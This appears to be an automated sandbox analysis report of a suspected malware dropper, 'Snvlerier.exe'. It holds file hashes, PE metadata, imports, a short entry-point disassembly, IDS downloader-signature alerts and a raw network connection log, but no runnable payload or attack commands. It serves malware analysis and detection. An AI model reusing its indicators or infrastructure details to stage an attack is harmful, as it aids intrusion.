| SSDEEP: | 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA |
| MD5: | A35685B2B980F4BD3C6FD278EA661412 |
| SHA1: | 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062 |
| SHA-256: | 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930 |
| SHA-512: | 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC |
| Malicious: | false |
| Reputation: | moderate, very likely benign file |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Reputation: | high, very likely benign file |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Reputation: | high, very likely benign file |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 60 |
| Entropy (8bit): | 4.038920595031593 |
| Encrypted: | false |
| SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
| MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
| SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
| SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\Snvlerier.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 300861 |
| Entropy (8bit): | 7.7511637196757555 |
| Encrypted: | false |
| SSDEEP: | 6144:jI86lpff3tCgSm4B7hnaVwM8JAaLzbIE2smQC+rdF/5ijgbSGai:b+pAbri5favbF/JF/5imSGai |
| MD5: | 8BEAF2A3C5AA8462B0B405AD4ED8C9A5 |
| SHA1: | 56F13E581E2438CE4848316A5482D062502AA956 |
| SHA-256: | B2432F5CB4DAB3BFD81ED9E49AA2E620B185F3202E0057B2DBD16108E1D825A5 |
| SHA-512: | 0191EE306B4EDDE45A318FA6146656C865CC4C1A682E4720C5768AB9DDC1817F504523535F06F763862A038ADE373BB4AFBDEA1EA06B576D082741E86364EA90 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\Snvlerier.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 443990 |
| Entropy (8bit): | 4.941029317076222 |
| Encrypted: | false |
| SSDEEP: | 6144:6FWzFzCG7J2HcSyF52UZ0r641maYuVuWrazCdAZfwsGw+N12Adr+Nrng2Cx45c:6Fq/keFZD4saT7razvpGdN6pgDx45c |
| MD5: | F2D3C6D1004E7B627C96E94931628A07 |
| SHA1: | B85780713E50904F7EA04C9A471E0888524CF2CD |
| SHA-256: | 6FF9B11E018A7E20D33D3752847FC0FCE561199A9C0716F7512B108933086D5E |
| SHA-512: | C48C79485FD21637A31428D211DB43C939BD874AB2C16AB5DF7D9DB1E792328486DB3FBE5F1B1002B88D13B71C4229E36C0419AAF95F99EEDE112C8D29BDE85E |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\Snvlerier.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 53488 |
| Entropy (8bit): | 5.354606050376097 |
| Encrypted: | false |
| SSDEEP: | 768:iCSkeNeDpS/zxwceiKuHkzJlnBK0VI05dsjQy8wJ1Asd/vqN/5xhSmDC3GER08yZ:gwSOTZG9EstvqHHBFLwgWA8skWakl |
| MD5: | 0BD036116E386AD4087EE98B7E9B202B |
| SHA1: | 8FA72B8D7863E783966744A27AA859A01A0F023B |
| SHA-256: | BD0E151A557B61A444BB30970B0AC73CDAE213ADDBA8B30F0D04231E59B81D00 |
| SHA-512: | 6B024CC20A52C6E9B853114549D3EDC0AF400B76F918CD2667653936A51AF78E57E0BB41945683E823E85B5A8CF99FF8DB290874BB48619610D6530F125269A7 |
| Malicious: | true |
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1261140 |
| Entropy (8bit): | 7.792082394746061 |
| Encrypted: | false |
| SSDEEP: | 24576:voqqHmQ2mlK1Vq4XYV+EYBU0pD1VHTkXQk9duRUrO0SmJ7GtHufK70y:voZmQ7KVVXzEYBUspQQEuROO0Douf+ |
| MD5: | 9970463EDF086976996F0BC196FCFC60 |
| SHA1: | 22F3132F1456DBA3BCC7096D2C10C5635EE08828 |
| SHA-256: | 6E0230EAC8EEADD5214B6D83CC2F470933BEE1C4261A607E182A093AF14B62CB |
| SHA-512: | BED16BF0F2AD277AC3CF34937E128EFBD861472F99C0D1CB36F1BB89F7A5DAB64174BC113C707CEEE52A2BC39D2546610015EDB54C18A076A297CE5EC7D7C7D9 |
| Malicious: | true |
| Antivirus: |
|
| Preview: |
| Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 26 |
| Entropy (8bit): | 3.95006375643621 |
| Encrypted: | false |
| SSDEEP: | 3:ggPYV:rPYV |
| MD5: | 187F488E27DB4AF347237FE461A079AD |
| SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
| SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
| SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
| Malicious: | true |
| Preview: |
| Process: | C:\Users\user\Desktop\Snvlerier.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 489839 |
| Entropy (8bit): | 4.9388616235368294 |
| Encrypted: | false |
| SSDEEP: | 6144:IW3TRzZ6utbZfJXer6QH6fTRK0qqvNhoJjrpb+YL5UTyasf3cEjyRe/mCHMr5Vc2:IOVF6el43H6AxqcrV+YLIyZfsiYe/fH |
| MD5: | 4D2DCA07B4793B8F3398BE8ABB6B9A15 |
| SHA1: | 86F7C87B328BE584603E0F5AEC19B9F43E568F04 |
| SHA-256: | A1BB849E12E5C2BE8A84543C1942AA1A670A394C7F78D5941F66553F3D3C16CD |
| SHA-512: | 7C1DFEF914C3DB2EECEBBAE8D6BE6F2BE50C1546D96D03D01C850F34A23B47347AFEAF84875995727155286021A021ED29B1C004F6F628A56795577D6AD206E7 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\Snvlerier.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 142857 |
| Entropy (8bit): | 4.930504957178138 |
| Encrypted: | false |
| SSDEEP: | 3072:3HT6wVoryD42JOe5jbX/H7HqpXKmzorrt1BbL4TYw/IvfE:3uwVoYOe5f/H7HqpjcN1dUMkI3E |
| MD5: | 475F44660157184A49238FA6DFB94FD0 |
| SHA1: | F2659AC1A79399BCE830EA9539E26A54AB6674D0 |
| SHA-256: | C3E03B93B2CAB1FB731BD44F8F85940D96DC814CD11EA2D39C0EB01BF0DBC3DE |
| SHA-512: | 1B1D85FA7289689C0A5509B1BAD12F044CCDC6F73803775BC144A0F7C76252B49E448D772438A7695F19B926BF72054945B3324EE7EC7BCAC3E97ACD54B3E5A7 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\Snvlerier.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 350 |
| Entropy (8bit): | 4.269100199509316 |
| Encrypted: | false |
| SSDEEP: | 6:uTM3xL6dnQI9rEEJxgOJbZoSWnFrvZXpECWaMdCJzwI+2bS93kH/G7qaqJvJn:uA3xL6VQPGxgRtFred+wE+wcqaqzn |
| MD5: | 2E0BEA6275406633E059EEECE6A1F594 |
| SHA1: | 7E4A65A0A0EC605412989E0E2D9BA9B3DFE7D0D5 |
| SHA-256: | 5B75D42D64EB1BEA2AC77BE7A9258F65F80A38876B2B6D377BF202CD0D7A0E67 |
| SHA-512: | 527ADD4EB664D7B7B34609E678D418930B55D482332B4E15B8CECE8713BE0F829C211E2348EA209EACA2BDEA50BF0F1D79CFB5C22041CBBD16140DBF6D3DC562 |
| Malicious: | false |
| Preview: |
| Process: | C:\Users\user\Desktop\Snvlerier.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1437022 |
| Entropy (8bit): | 5.79930707482526 |
| Encrypted: | false |
| SSDEEP: | 24576:zBa256R8mSTy2q/kSZDLveCgt7U6I2aDcBHnt3XaY6Z:zBa256SmKy2CkSa5gql+ |
| MD5: | 09F05569DA77DDB915990BC80C54547B |
| SHA1: | E30BB9965DF58ADC84FBD61B23EB2DB7E3315CCB |
| SHA-256: | F552ED0368CD2ED7A90F0B7E3A950C3CE767D99742A771882D15BACBED1441BC |
| SHA-512: | 7AE9F2F8AF577E203E480715A94E63375AE4E60FF596B52641500BCB9F5A423D9A299AB092789A7774D4EA7B25F091032BE919557DBF5F782BCCC3D80AFF8473 |
| Malicious: | true |
| Antivirus: |
|
| Preview: |
| File type: | |
| Entropy (8bit): | 7.792082394746061 |
| TrID: |
|
| File name: | Snvlerier.exe |
| File size: | 1'261'140 bytes |
| MD5: | 9970463edf086976996f0bc196fcfc60 |
| SHA1: | 22f3132f1456dba3bcc7096d2c10c5635ee08828 |
| SHA256: | 6e0230eac8eeadd5214b6d83cc2f470933bee1c4261a607e182a093af14b62cb |
| SHA512: | bed16bf0f2ad277ac3cf34937e128efbd861472f99c0d1cb36f1bb89f7a5dab64174bc113c707ceee52a2bc39d2546610015edb54c18a076a297ce5ec7d7c7d9 |
| SSDEEP: | 24576:voqqHmQ2mlK1Vq4XYV+EYBU0pD1VHTkXQk9duRUrO0SmJ7GtHufK70y:voZmQ7KVVXzEYBUspQQEuROO0Douf+ |
| TLSH: | 47451202E9C0CFD7F96648B044D5E494B3F569F94DD16B0F32CD269A28F98E374A821D |
| File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....e.Q.................\..........M2.......p....@ |
 | |
| Icon Hash: | 071c5c5f4f20111f |
| Entrypoint: | 0x40324d |
| Entrypoint Section: | .text |
| Digitally signed: | false |
| Imagebase: | 0x400000 |
| Subsystem: | windows gui |
| Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
| DLL Characteristics: | TERMINAL_SERVER_AWARE |
| Time Stamp: | 0x519965D9 [Sun May 19 23:52:57 2013 UTC] |
| TLS Callbacks: | |
| CLR (.Net) Version: | |
| OS Version Major: | 4 |
| OS Version Minor: | 0 |
| File Version Major: | 4 |
| File Version Minor: | 0 |
| Subsystem Version Major: | 4 |
| Subsystem Version Minor: | 0 |
| Import Hash: | e990dd07e89d04c53e337ab9b3f5e0cc |
| Instruction |
|---|
| sub esp, 00000184h |
| push ebx |
| push ebp |
| push esi |
| xor ebx, ebx |
| push edi |
| mov dword ptr [esp+1Ch], ebx |
| mov dword ptr [esp+10h], 00409130h |
| mov dword ptr [esp+18h], ebx |
| mov byte ptr [esp+14h], 00000020h |
| call dword ptr [00407034h] |
| push 00008001h |
| call dword ptr [004070B4h] |
| push ebx |
| call dword ptr [0040728Ch] |
| push 00000008h |
| mov dword ptr [00423F98h], eax |
| call 00007F3FD881168Bh |
| mov dword ptr [00423EE4h], eax |
| push ebx |
| lea eax, dword ptr [esp+38h] |
| push 00000160h |
| push eax |
| push ebx |
| push 0041F4A0h |
| call dword ptr [00407164h] |
| push 004091E4h |
| push 004236E0h |
| call 00007F3FD8811335h |
| call dword ptr [004070B0h] |
| mov ebp, 00429000h |
| push eax |
| push ebp |
| call 00007F3FD8811323h |
| push ebx |
| call dword ptr [00407114h] |
| cmp byte ptr [00429000h], 00000022h |
| mov dword ptr [00423EE0h], eax |
| mov eax, ebp |
| jne 00007F3FD880E90Ch |
| mov byte ptr [esp+14h], 00000022h |
| mov eax, 00429001h |
| push dword ptr [esp+14h] |
| push eax |
| call 00007F3FD8810DD0h |
| push eax |
| call dword ptr [00407220h] |
| mov dword ptr [esp+20h], eax |
| jmp 00007F3FD880E9C0h |
| cmp cl, 00000020h |
| jne 00007F3FD880E908h |
| inc eax |
| cmp byte ptr [eax], 00000020h |
| je 00007F3FD880E8FCh |
| Programming Language: |
|
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x34000 | 0x3edb0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x5bf0 | 0x5c00 | f0d04a8cf00dab694f96f83a6fb8deea | False | 0.6697944972826086 | data | 6.4809131863371 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x7000 | 0x11ce | 0x1200 | 6bf29bc07ee82c85e22382576e6107a3 | False | 0.4529079861111111 | OpenPGP Secret Key | 5.235976864115322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x9000 | 0x1afd8 | 0x400 | b8099c4227307bfa21b577bd03cec2ce | False | 0.6015625 | data | 4.935360760194213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x24000 | 0x10000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x34000 | 0x3edb0 | 0x3ee00 | 38123f82dccbdf37cd57e4d88cc46b85 | False | 0.5937072875248509 | data | 6.240361968643795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_BITMAP | 0x34418 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
| RT_ICON | 0x34780 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.41602093931148704 |
| RT_ICON | 0x44fa8 | 0xfd49 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9991209265742355 |
| RT_ICON | 0x54cf8 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.46849379861257096 |
| RT_ICON | 0x5e1a0 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.47424812030075186 |
| RT_ICON | 0x64988 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4914972273567468 |
| RT_ICON | 0x69e10 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.48541568256967405 |
| RT_ICON | 0x6e038 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5407676348547718 |
| RT_ICON | 0x705e0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5886491557223265 |
| RT_ICON | 0x71688 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6635245901639344 |
| RT_ICON | 0x72010 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.750886524822695 |
| RT_DIALOG | 0x72478 | 0x144 | data | English | United States | 0.5216049382716049 |
| RT_DIALOG | 0x725c0 | 0x13c | data | English | United States | 0.5506329113924051 |
| RT_DIALOG | 0x72700 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x72800 | 0x11c | data | English | United States | 0.6056338028169014 |
| RT_DIALOG | 0x72920 | 0xc4 | data | English | United States | 0.5918367346938775 |
| RT_DIALOG | 0x729e8 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x72a48 | 0x92 | data | English | United States | 0.7123287671232876 |
| RT_MANIFEST | 0x72ae0 | 0x2cb | XML 1.0 document, ASCII text, with very long lines (715), with no line terminators | English | United States | 0.5664335664335665 |
| DLL | Import |
|---|---|
| KERNEL32.dll | Sleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, SetFileAttributesA, lstrcmpiA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetTempPathA, GetWindowsDirectoryA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar |
| USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA |
| ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
| VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States |  |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library Node| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-14T09:12:11.601627+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49744 | 193.122.130.0 | 80 | TCP |
| 2024-10-14T09:12:12.929762+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49744 | 193.122.130.0 | 80 | TCP |
| 2024-10-14T09:12:13.508895+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49756 | 188.114.96.3 | 443 | TCP |
| 2024-10-14T09:12:14.070380+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49762 | 193.122.130.0 | 80 | TCP |
| 2024-10-14T09:12:14.647364+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49768 | 188.114.96.3 | 443 | TCP |
| 2024-10-14T09:12:16.929136+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49783 | 188.114.96.3 | 443 | TCP |
| 2024-10-14T09:12:19.118410+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49802 | 188.114.96.3 | 443 | TCP |
| 2024-10-14T09:12:21.359711+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49821 | 188.114.96.3 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 14, 2024 09:12:05.986233950 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:05.986306906 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:05.986378908 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:06.021692991 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:06.021744967 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:06.686444044 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:06.686556101 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:06.687571049 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:06.687630892 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:06.756251097 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:06.756330013 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:06.757244110 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:06.757313967 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:06.760781050 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:06.807418108 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.067979097 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.068079948 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:07.068146944 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.068208933 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:07.068291903 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.068317890 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:07.068350077 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:07.068391085 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:07.068399906 CEST | 443 | 49736 | 142.250.185.110 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.068465948 CEST | 49736 | 443 | 192.168.2.4 | 142.250.185.110 |
| Oct 14, 2024 09:12:07.105299950 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:07.105356932 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.105468035 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:07.105756044 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:07.105787039 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.784305096 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.784437895 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:07.886735916 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:07.886780024 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.887722969 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:07.887820959 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:07.891719103 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:07.939407110 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.067137957 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.067241907 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.072962046 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.073126078 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
| Oct 14, 2024 09:12:10.085719109 CEST | 443 | 49737 | 142.250.185.97 | 192.168.2.4 |
| Oct 14, 2024 09:12:10.085773945 CEST | 49737 | 443 | 192.168.2.4 | 142.250.185.97 |
